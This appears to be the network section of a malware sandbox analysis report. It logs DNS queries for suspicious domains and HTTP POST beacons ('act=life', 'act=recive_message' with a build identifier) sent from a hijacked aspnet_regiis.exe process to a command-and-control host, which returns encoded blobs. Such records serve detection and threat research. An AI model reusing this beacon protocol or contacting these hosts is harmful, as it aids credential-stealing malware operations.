                                                                                  Dec 30, 2024 21:09:06.472544909 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:06.472594023 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:06.472749949 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.943200111 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.943418980 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.943500996 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:06.943535089 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.943664074 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.943712950 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:06.943725109 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.943861961 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.943912029 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:06.943922043 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.944037914 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.944081068 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:06.944091082 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.944225073 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.944286108 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:06.944295883 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:06.986635923 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:06.986660957 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:07.033529997 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:07.055269003 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:07.055622101 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:07.055684090 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:07.055746078 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:07.055783987 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:07.055813074 CET49731443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:07.055826902 CET44349731104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:07.194087029 CET49733443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:07.194120884 CET44349733104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:07.194210052 CET49733443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:07.194495916 CET49733443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:07.194510937 CET44349733104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:07.725819111 CET44349733104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:07.725900888 CET49733443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:07.726952076 CET49733443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:07.726959944 CET44349733104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:07.727185011 CET44349733104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:07.728826046 CET49733443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:07.728960991 CET49733443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:07.728993893 CET44349733104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:07.729060888 CET49733443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:07.729069948 CET44349733104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:09.823618889 CET44349733104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:09.823870897 CET44349733104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:09.823925972 CET49733443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:09.824008942 CET49733443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:09.824023008 CET44349733104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:09.975588083 CET49738443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:09.975615025 CET44349738104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:09.975681067 CET49738443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:09.976061106 CET49738443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:09.976077080 CET44349738104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:10.474777937 CET44349738104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:10.474875927 CET49738443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:10.476178885 CET49738443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:10.476188898 CET44349738104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:10.476506948 CET44349738104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:10.485171080 CET49738443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:10.485311985 CET49738443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:10.485348940 CET44349738104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:10.945103884 CET44349738104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:10.945369959 CET44349738104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:10.945422888 CET49738443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:10.945561886 CET49738443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:10.945579052 CET44349738104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:11.282272100 CET49740443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:11.282315969 CET44349740104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:11.282458067 CET49740443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:11.282948971 CET49740443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:11.282965899 CET44349740104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:11.745044947 CET44349740104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:11.745125055 CET49740443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:11.747241974 CET49740443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:11.747253895 CET44349740104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:11.747503042 CET44349740104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:11.791625977 CET49740443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:11.791771889 CET49740443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:11.791872978 CET44349740104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:11.791980028 CET49740443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:11.791992903 CET44349740104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:12.505089998 CET44349740104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:12.505367041 CET44349740104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:12.505439997 CET49740443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:12.505543947 CET49740443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:12.505567074 CET44349740104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:12.826339006 CET49742443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:12.826384068 CET44349742104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:12.826493979 CET49742443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:12.826828003 CET49742443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:12.826842070 CET44349742104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:13.309119940 CET44349742104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:13.309211016 CET49742443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:13.310435057 CET49742443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:13.310444117 CET44349742104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:13.310672998 CET44349742104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:13.312536001 CET49742443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:13.312609911 CET49742443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:13.312613010 CET44349742104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:13.619580984 CET44349742104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:13.619668961 CET44349742104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:13.619715929 CET49742443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:13.619939089 CET49742443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:13.619970083 CET44349742104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:13.698456049 CET49744443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:13.698513031 CET44349744104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:13.698627949 CET49744443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:13.698918104 CET49744443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:13.698935032 CET44349744104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:14.157356977 CET44349744104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:14.157571077 CET49744443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:14.159112930 CET49744443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:14.159125090 CET44349744104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:14.159370899 CET44349744104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:14.160517931 CET49744443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:14.160631895 CET49744443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:14.160638094 CET44349744104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:15.279975891 CET44349744104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:15.280081987 CET44349744104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:15.280136108 CET49744443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:15.280344009 CET49744443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:15.280368090 CET44349744104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:15.323697090 CET49746443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:15.323738098 CET44349746104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:15.323802948 CET49746443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:15.324327946 CET49746443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:15.324342012 CET44349746104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:15.787412882 CET44349746104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:15.787491083 CET49746443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:15.790550947 CET49746443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:15.790561914 CET44349746104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:15.790801048 CET44349746104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:15.791922092 CET49746443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:15.791950941 CET49746443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:15.791981936 CET44349746104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:16.303477049 CET44349746104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:16.303571939 CET44349746104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:16.303638935 CET49746443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:16.304012060 CET49746443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:16.304034948 CET44349746104.21.48.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:16.304049015 CET49746443192.168.2.4104.21.48.1
                                                                                  Dec 30, 2024 21:09:16.304058075 CET44349746104.21.48.1192.168.2.4
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 30, 2024 21:09:04.695492983 CET6282253192.168.2.41.1.1.1
                                                                                  Dec 30, 2024 21:09:04.705519915 CET53628221.1.1.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:04.709423065 CET5792453192.168.2.41.1.1.1
                                                                                  Dec 30, 2024 21:09:04.718127012 CET53579241.1.1.1192.168.2.4
                                                                                  Dec 30, 2024 21:09:04.723227978 CET5279853192.168.2.41.1.1.1
                                                                                  Dec 30, 2024 21:09:04.736599922 CET53527981.1.1.1192.168.2.4
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Dec 30, 2024 21:09:04.695492983 CET192.168.2.41.1.1.10x6f8Standard query (0)ingreem-eilish.bizA (IP address)IN (0x0001)false
                                                                                  Dec 30, 2024 21:09:04.709423065 CET192.168.2.41.1.1.10x4cfdStandard query (0)nearycrepso.shopA (IP address)IN (0x0001)false
                                                                                  Dec 30, 2024 21:09:04.723227978 CET192.168.2.41.1.1.10x5d3dStandard query (0)abruptyopsn.shopA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Dec 30, 2024 21:09:04.705519915 CET1.1.1.1192.168.2.40x6f8Name error (3)ingreem-eilish.biznonenoneA (IP address)IN (0x0001)false
                                                                                  Dec 30, 2024 21:09:04.718127012 CET1.1.1.1192.168.2.40x4cfdName error (3)nearycrepso.shopnonenoneA (IP address)IN (0x0001)false
                                                                                  Dec 30, 2024 21:09:04.736599922 CET1.1.1.1192.168.2.40x5d3dNo error (0)abruptyopsn.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                  Dec 30, 2024 21:09:04.736599922 CET1.1.1.1192.168.2.40x5d3dNo error (0)abruptyopsn.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                  Dec 30, 2024 21:09:04.736599922 CET1.1.1.1192.168.2.40x5d3dNo error (0)abruptyopsn.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                  Dec 30, 2024 21:09:04.736599922 CET1.1.1.1192.168.2.40x5d3dNo error (0)abruptyopsn.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                  Dec 30, 2024 21:09:04.736599922 CET1.1.1.1192.168.2.40x5d3dNo error (0)abruptyopsn.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                  Dec 30, 2024 21:09:04.736599922 CET1.1.1.1192.168.2.40x5d3dNo error (0)abruptyopsn.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                  Dec 30, 2024 21:09:04.736599922 CET1.1.1.1192.168.2.40x5d3dNo error (0)abruptyopsn.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                  • abruptyopsn.shop
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.449730104.21.48.14432492C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-30 20:09:05 UTC263OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 8
                                                                                  Host: abruptyopsn.shop
                                                                                  2024-12-30 20:09:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                  Data Ascii: act=life
                                                                                  2024-12-30 20:09:05 UTC1123INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Dec 2024 20:09:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=t1fmef995inhhd747meenb9f32; expires=Fri, 25 Apr 2025 13:55:44 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=42Xi65m%2BKg5B7KoR2bbXqAEUlmVKOt7uhRUmMPfilKgh4TZFFHu25Xqa7IHsSm7lXqh%2FyeDIE92vA1MB1rP6WuadPqMh0uj99SWy%2B8ydLvk8ZYRy5GD6yNuJ60q%2B5WXKWJMb"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fa4aa61bd2643be-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1620&rtt_var=632&sent=7&recv=7&lost=0&retrans=0&sent_bytes=3053&recv_bytes=907&delivery_rate=2545031&cwnd=227&unsent_bytes=0&cid=2885177b8acfa2dd&ts=677&x=0"
                                                                                  2024-12-30 20:09:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                  Data Ascii: 2ok
                                                                                  2024-12-30 20:09:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.449731104.21.48.14432492C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-30 20:09:06 UTC264OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 86
                                                                                  Host: abruptyopsn.shop
                                                                                  2024-12-30 20:09:06 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 37 33 66 38 32 65 65 64 36 35 32 31 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--73f82eed6521&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                  2024-12-30 20:09:06 UTC1117INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Dec 2024 20:09:06 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=421h3a75dgsrkdc2thvvvnh7ni; expires=Fri, 25 Apr 2025 13:55:45 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ufsO32sM0oxvbZiimB7K6XpHsKBdpmrvHP8W05ujWTBKu68rpI2ThXdbxp82ieeq39LNzTo5OM7RQxRIlXNVeYDeQG6dvtbCxbeEupqNp60ofzfjQsfgfvSj%2FmpFWqA1C7bY"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fa4aa67c8638c15-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1879&min_rtt=1825&rtt_var=793&sent=7&recv=8&lost=0&retrans=0&sent_bytes=3052&recv_bytes=986&delivery_rate=1937195&cwnd=239&unsent_bytes=0&cid=3982c03b20b03de1&ts=496&x=0"
                                                                                  2024-12-30 20:09:06 UTC252INData Raw: 34 37 30 0d 0a 54 73 54 6b 58 4b 53 67 68 31 78 72 4b 6c 71 6c 4b 37 54 66 67 47 46 74 59 34 72 77 50 70 44 53 51 32 6a 6c 53 4a 56 52 49 63 49 31 35 70 4a 2b 6e 70 53 72 66 68 68 50 65 4a 39 4e 31 62 50 7a 42 45 46 42 36 35 51 63 71 72 51 69 42 4a 59 74 75 58 4e 58 72 32 7a 2b 67 6a 33 49 30 2b 4a 77 53 55 38 69 68 78 48 76 70 4b 49 45 41 30 47 77 30 6c 76 36 73 43 49 45 68 79 6e 2b 50 6c 47 75 4c 61 79 49 4f 38 7a 46 35 44 67 4b 52 6a 66 41 54 74 47 2b 36 67 38 45 44 75 4b 64 48 4c 7a 77 4a 68 4c 48 63 72 63 63 52 4c 59 76 69 59 55 76 7a 34 4c 36 63 42 41 49 50 38 73 4a 6a 76 33 68 42 41 38 50 37 4a 52 56 2b 4c 6f 72 44 49 59 73 2f 79 46 49 70 43 61 73 68 6a 6a 4e 7a 2b 30 73 42 30 77 77 79 30 6a 62 76 71 4a 4e 54 77 62 77 30 67 53 79 34 78 4d
                                                                                  Data Ascii: 470TsTkXKSgh1xrKlqlK7TfgGFtY4rwPpDSQ2jlSJVRIcI15pJ+npSrfhhPeJ9N1bPzBEFB65QcqrQiBJYtuXNXr2z+gj3I0+JwSU8ihxHvpKIEA0Gw0lv6sCIEhyn+PlGuLayIO8zF5DgKRjfATtG+6g8EDuKdHLzwJhLHcrccRLYviYUvz4L6cBAIP8sJjv3hBA8P7JRV+LorDIYs/yFIpCashjjNz+0sB0wwy0jbvqJNTwbw0gSy4xM
                                                                                  2024-12-30 20:09:06 UTC891INData Raw: 4a 6c 6a 76 69 50 6c 4f 6d 62 4c 6e 49 4a 34 62 46 36 58 35 52 43 44 44 4c 52 39 4f 2b 37 51 51 4f 41 66 71 64 58 50 47 34 4b 51 36 4e 4a 66 67 38 54 61 6f 72 72 6f 38 35 79 63 58 74 4f 41 5a 4c 65 49 6b 4a 30 61 57 69 57 30 38 68 2b 4a 46 66 35 72 30 77 53 70 68 6b 37 6e 4e 45 72 47 7a 2b 78 6a 6a 49 77 2b 67 2b 47 30 41 7a 7a 45 7a 45 74 75 73 4f 41 67 48 6c 6d 46 50 78 73 43 59 41 6a 53 58 39 4e 30 36 74 4b 71 61 47 66 6f 69 43 34 69 5a 4a 45 48 6a 6b 54 4d 61 36 37 68 56 4e 4f 36 69 4e 45 75 76 77 4a 67 62 48 63 72 63 37 52 71 4d 76 72 59 6b 39 7a 73 6e 33 50 68 74 4f 4e 63 4a 62 30 4c 6a 73 43 51 77 54 34 70 78 61 38 62 6b 71 41 34 49 74 38 33 4d 4e 34 43 75 2b 78 6d 61 47 34 2b 67 31 42 55 49 76 78 77 6e 4a 38 2f 74 44 43 41 32 6f 79 68 7a 32 73 53
                                                                                  Data Ascii: JljviPlOmbLnIJ4bF6X5RCDDLR9O+7QQOAfqdXPG4KQ6NJfg8Taorro85ycXtOAZLeIkJ0aWiW08h+JFf5r0wSphk7nNErGz+xjjIw+g+G0AzzEzEtusOAgHlmFPxsCYAjSX9N06tKqaGfoiC4iZJEHjkTMa67hVNO6iNEuvwJgbHcrc7RqMvrYk9zsn3PhtONcJb0LjsCQwT4pxa8bkqA4It83MN4Cu+xmaG4+g1BUIvxwnJ8/tDCA2oyhz2sS
                                                                                  2024-12-30 20:09:06 UTC1369INData Raw: 33 65 39 63 0d 0a 68 42 7a 74 2f 6a 68 4b 67 43 61 33 61 77 4f 75 49 61 32 4b 4f 63 2f 44 35 6a 34 44 52 6a 66 4e 51 64 36 39 37 77 49 45 43 65 36 66 56 2f 32 2f 4a 67 4b 45 4a 76 49 2b 51 4f 42 69 35 6f 45 6d 68 70 71 6c 47 77 64 4c 4b 64 59 4c 34 37 37 73 44 51 67 58 71 49 30 53 36 2f 41 6d 42 73 64 79 74 7a 6c 45 70 79 69 72 6a 44 33 43 78 75 67 78 41 45 45 78 31 55 50 61 73 2f 41 4f 42 51 54 6d 6e 6c 6e 39 73 43 41 4c 69 53 44 38 63 77 33 67 4b 37 37 47 5a 6f 62 74 36 43 34 62 51 6a 50 57 43 2b 4f 2b 37 41 30 49 46 36 69 4e 45 75 76 77 4a 67 62 48 63 72 63 34 52 61 77 67 70 6f 41 73 79 4d 33 33 4e 42 74 4d 4e 73 4e 46 32 4c 54 76 44 41 6f 54 37 4a 4a 4f 38 37 55 6d 42 49 6f 34 38 6e 4d 4e 34 43 75 2b 78 6d 61 47 2b 4e 45 35 47 56 6b 2f 68 58 7a 56 73
                                                                                  Data Ascii: 3e9chBzt/jhKgCa3awOuIa2KOc/D5j4DRjfNQd697wIECe6fV/2/JgKEJvI+QOBi5oEmhpqlGwdLKdYL477sDQgXqI0S6/AmBsdytzlEpyirjD3CxugxAEEx1UPas/AOBQTmnln9sCALiSD8cw3gK77GZobt6C4bQjPWC+O+7A0IF6iNEuvwJgbHcrc4RawgpoAsyM33NBtMNsNF2LTvDAoT7JJO87UmBIo48nMN4Cu+xmaG+NE5GVk/hXzVs
                                                                                  2024-12-30 20:09:06 UTC1369INData Raw: 42 70 74 4a 53 39 4c 42 68 55 70 45 36 34 44 52 63 37 6a 58 6d 67 54 4b 47 6d 71 55 30 47 30 30 32 77 30 50 54 75 65 34 4a 44 77 54 36 6d 6c 72 31 76 43 6b 50 69 43 7a 79 50 6b 53 72 4c 37 53 55 50 63 4c 4d 36 58 35 48 43 44 2f 66 43 59 37 39 78 78 51 4d 45 65 36 52 48 4f 33 2b 4f 45 71 41 4a 72 64 72 41 36 41 69 71 6f 30 35 7a 63 6e 68 4f 67 6c 46 4d 38 6c 48 33 37 48 71 44 77 67 54 35 5a 64 55 2b 4c 6b 6b 42 6f 6f 70 35 54 42 43 34 47 4c 6d 67 53 61 47 6d 71 55 5a 4f 6e 38 62 68 31 61 59 70 4b 49 45 41 30 47 77 30 6c 33 36 74 79 38 4f 6c 53 54 6c 50 55 53 67 4b 71 36 4f 4f 63 72 4d 36 79 77 42 53 54 6a 4a 52 74 36 30 35 67 49 4c 42 65 53 56 48 4c 7a 77 4a 68 4c 48 63 72 63 62 51 4c 6f 32 35 4b 67 31 78 73 58 31 4b 42 49 49 4a 34 6c 51 6c 72 72 75 51 31
                                                                                  Data Ascii: BptJS9LBhUpE64DRc7jXmgTKGmqU0G002w0PTue4JDwT6mlr1vCkPiCzyPkSrL7SUPcLM6X5HCD/fCY79xxQMEe6RHO3+OEqAJrdrA6Aiqo05zcnhOglFM8lH37HqDwgT5ZdU+LkkBoop5TBC4GLmgSaGmqUZOn8bh1aYpKIEA0Gw0l36ty8OlSTlPUSgKq6OOcrM6ywBSTjJRt605gILBeSVHLzwJhLHcrcbQLo25Kg1xsX1KBIIJ4lQlrruQ1
                                                                                  2024-12-30 20:09:06 UTC1369INData Raw: 57 2f 37 77 65 55 71 4b 4f 50 59 32 55 61 51 6a 72 5a 51 31 77 4d 4c 67 4c 41 35 45 4d 73 68 4b 33 72 44 68 43 78 30 42 35 5a 4a 4f 34 4c 59 71 42 4d 64 6b 74 7a 52 62 34 48 54 6d 74 79 6e 4e 67 76 70 77 45 41 67 2f 79 77 6d 4f 2f 65 45 4a 41 67 2f 36 6c 6c 72 35 73 79 38 43 67 69 4c 7a 4f 55 36 76 4a 36 79 50 4e 73 62 4e 34 44 59 43 54 6a 62 47 54 39 71 77 6f 6b 31 50 42 76 44 53 42 4c 4b 58 4f 77 65 42 50 65 59 47 52 4b 42 39 35 70 6c 77 33 34 4c 69 4d 6b 6b 51 65 4d 70 46 33 4c 44 6e 42 77 63 47 36 35 4e 51 39 72 30 73 44 6f 34 75 38 69 46 52 70 69 4b 6d 69 54 44 4a 7a 76 63 77 44 45 67 30 68 77 65 57 75 76 70 44 56 30 48 5a 68 56 79 79 72 32 38 54 78 79 33 37 63 78 76 67 49 36 75 55 4d 73 6e 43 35 44 30 4e 51 7a 2f 42 54 39 65 2b 35 77 41 4b 42 2b 6d
